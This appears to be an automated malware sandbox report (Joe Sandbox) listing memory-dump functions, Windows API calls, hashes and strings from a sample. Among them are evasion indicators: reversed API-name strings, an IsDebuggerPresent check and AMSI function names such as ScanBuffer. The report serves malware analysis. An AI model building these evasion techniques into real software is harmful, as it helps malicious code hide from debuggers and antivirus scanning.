                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 1992179935-0
                                                              • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                                              • Instruction ID: 6bd442c89309bfc335480d5bd8685546eb6549edd52eff1ef8f6ff7a838a70ed
                                                              • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                                              • Instruction Fuzzy Hash: 4F814E72A00705AFE724EE78CC52B6A73E9AF86364F14452EE415D7280EB74DA00EFD5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: a169deee8d6ced91b4625a1f20bcaf9c98a75f3c366a0d0b8970e9d133f6d33b
                                                              • Instruction ID: 3c1b5b7afdea362396617ec608c2421219373dedc24d6018c991f51c97c546fb
                                                              • Opcode Fuzzy Hash: a169deee8d6ced91b4625a1f20bcaf9c98a75f3c366a0d0b8970e9d133f6d33b
                                                              • Instruction Fuzzy Hash: FB51AD369042346BDF28DF68D840BBBB7ADDF85364F14415AEC489B280EF719E0AC691
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __cftoe
                                                              • String ID:
                                                              • API String ID: 4189289331-0
                                                              • Opcode ID: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                                              • Instruction ID: 40f006fb4f1aa663b0a50f5a7c8f1722e492b166a9239f4130ba0d7eac665faf
                                                              • Opcode Fuzzy Hash: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                                              • Instruction Fuzzy Hash: A2512D72900225ABDF3DDF698C41FAE77A9EF89334F504129F819A7181DF31D608DA64
                                                              APIs
                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B8E5AD
                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B8E5C9
                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B8E602
                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B8E67F
                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B8E698
                                                              • VariantCopy.OLEAUT32(?,00000000), ref: 02B8E6CD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                              • String ID:
                                                              • API String ID: 351091851-0
                                                              • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                              • Instruction ID: f59486620b0a623526fe5d36b74fdb37e94f2ff98b0fb904cdc1ff630e0f3710
                                                              • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                              • Instruction Fuzzy Hash: B151B7759006299BCB26EB68C880BD9B3BDAF4D310F4441D6E50DA7252D630EF85CF61
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 02BF0E50
                                                              • int.LIBCPMT ref: 02BF0E63
                                                                • Part of subcall function 02BEE075: std::_Lockit::_Lockit.LIBCPMT ref: 02BEE086
                                                                • Part of subcall function 02BEE075: std::_Lockit::~_Lockit.LIBCPMT ref: 02BEE0A0
                                                              • std::_Facet_Register.LIBCPMT ref: 02BF0EA3
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 02BF0EAC
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02BF0ECA
                                                              • __Init_thread_footer.LIBCMT ref: 02BF0F0B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                              • String ID:
                                                              • API String ID: 3815856325-0
                                                              • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                                              • Instruction ID: d35417a121886f1ce03b71e735fd61f1b88367dc0c0257b2196b62ceac7e1435
                                                              • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                                              • Instruction Fuzzy Hash: 1A210532900114EBCB14FBA8E8429DD77B9DF05320F2005EAE945A72E1EF349E45AFD5
                                                              APIs
                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B8358A
                                                              • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B835BD
                                                              • RegCloseKey.ADVAPI32(?,02B835E0,00000000,?,00000004,00000000,02B835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B835D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                              • API String ID: 3677997916-4173385793
                                                              • Opcode ID: e3fc2b7c5d7656280f428c1df30e8eecfd4e3e76b72d5c25e92f183de5152bb8
                                                              • Instruction ID: 190acc5e9fee44fa69fdcc95c65f4ed835178289655a51984ba65afd81c76963
                                                              • Opcode Fuzzy Hash: e3fc2b7c5d7656280f428c1df30e8eecfd4e3e76b72d5c25e92f183de5152bb8
                                                              • Instruction Fuzzy Hash: 0B01D875954308BAF711EF94CD03BBDB7ECE708B10F1005E1BA08D7990E6749611CB59
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                              • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                              • GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: Kernel32$sserddAcorPteG
                                                              • API String ID: 667068680-1372893251
                                                              • Opcode ID: f79e5afb4bfdc242174ea7ac60c4f2ec830e9226a633e9e378820ee9156b0b47
                                                              • Instruction ID: af86d6966c1a6d325e1fe9ca05e6ffb44cecfc31540bcc4d4edde7ba96c8444c
                                                              • Opcode Fuzzy Hash: f79e5afb4bfdc242174ea7ac60c4f2ec830e9226a633e9e378820ee9156b0b47
                                                              • Instruction Fuzzy Hash: 4C012C79A50304BFEF00EBA8D841A9E77BEEB49710F5188A4F50897A10DA34A910CE24
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                                              • Instruction ID: d852c8d0e59b04d8a3c11fc73db99773e86cd6eb1e6b16eb265199c43b656592
                                                              • Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                                              • Instruction Fuzzy Hash: 81511531A00354AFDB24DF69CC41B6A77F5FF85720F1041AAE809EB290EB39DA09DB40
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __dosmaperr$_free
                                                              • String ID:
                                                              • API String ID: 242264518-0
                                                              • Opcode ID: 483cb59b05aae7222e8dd9b47b4a98874ada728b8e202fcd2bd4ef1ccfd8c6c3
                                                              • Instruction ID: d729138d3a0a4036b6f5d3767ac7b7a31945f3b5571cfa6f1487e8d7c2d9ce1f
                                                              • Opcode Fuzzy Hash: 483cb59b05aae7222e8dd9b47b4a98874ada728b8e202fcd2bd4ef1ccfd8c6c3
                                                              • Instruction Fuzzy Hash: 6B31A27240460AFFDF156FA4DC659AF7BADEF46364F100169F81097290DB31CA50EBA1
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 02BF1161
                                                              • int.LIBCPMT ref: 02BF1174
                                                                • Part of subcall function 02BEE075: std::_Lockit::_Lockit.LIBCPMT ref: 02BEE086
                                                                • Part of subcall function 02BEE075: std::_Lockit::~_Lockit.LIBCPMT ref: 02BEE0A0
                                                              • std::_Facet_Register.LIBCPMT ref: 02BF11B4
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 02BF11BD
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02BF11DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                              • String ID:
                                                              • API String ID: 2536120697-0
                                                              • Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                                              • Instruction ID: e2836ede9ad579a417331964e4a7d86fda3b26eb9b0c455aed1d215925a64010
                                                              • Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                                              • Instruction Fuzzy Hash: 56110A32500114E7CB14EF98E8418DE777ADF40360F1046AAE909A7290DB30DE859BD0
                                                              APIs
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02C196A2
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02C196BB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Value___vcrt_
                                                              • String ID:
                                                              • API String ID: 1426506684-0
                                                              • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                                              • Instruction ID: 737574180aa1ff997557bcb7fc15dc252e0d81aa6d3d5e41a2255c1a7fbe0e23
                                                              • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                                              • Instruction Fuzzy Hash: 6901843620D3215EAB652A766C96A2B2F96EF437757340739F614460E0FFE18801B594
                                                              APIs
                                                              • GetThreadLocale.KERNEL32(?,00000000,02B8AA6F,?,?,00000000), ref: 02B8A9F0
                                                                • Part of subcall function 02B8A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A
                                                              • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B8AA6F,?,?,00000000), ref: 02B8AA20
                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 02B8AA2B
                                                              • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B8AA6F,?,?,00000000), ref: 02B8AA49
                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 02B8AA54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Locale$InfoThread$CalendarEnum
                                                              • String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Similarity
                                                              • API ID: __dosmaperr
                                                              • String ID: H
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Similarity
                                                              • API ID: _free_strpbrk
                                                              • String ID: *?$.
                                                              APIs
                                                              • GetThreadLocale.KERNEL32(?,00000000,02B8AC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B8AAB7
                                                                • Part of subcall function 02B8A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Similarity
                                                              • API ID: Locale$InfoThread
                                                              • String ID: eeee$ggg$yyyy
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              • GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc
                                                              • String ID: AeldnaHeludoMteG$KernelBASE
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KernelBase,?,02B9EF98,UacInitialize,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,Initialize), ref: 02B9EB9A
                                                              • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B9EBAC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: IsDebuggerPresent$KernelBase
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,02BAC10B,00000000,02BAC11E), ref: 02B8C402
                                                              • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B8C413
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              APIs
                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B8E21F
                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B8E23B
                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B8E2B2
                                                              • VariantClear.OLEAUT32(?), ref: 02B8E2DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ArraySafe$Bound$ClearIndexVariant
                                                              • String ID:
                                                              • API String ID: 920484758-0
                                                              • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                              • Instruction ID: e164d1e99a325540b15e50a628cddb64a20d26c671c6ee6d7e0287f7c442ac9d
                                                              • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                              • Instruction Fuzzy Hash: 2C41E775A0062A9BCB61EF68CC90BD9B3BDAF49614F4042D6E64CA7251DA30EF80CF51
                                                              APIs
                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B8ACE1
                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B8AD05
                                                              • GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B8AD20
                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B8ADB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
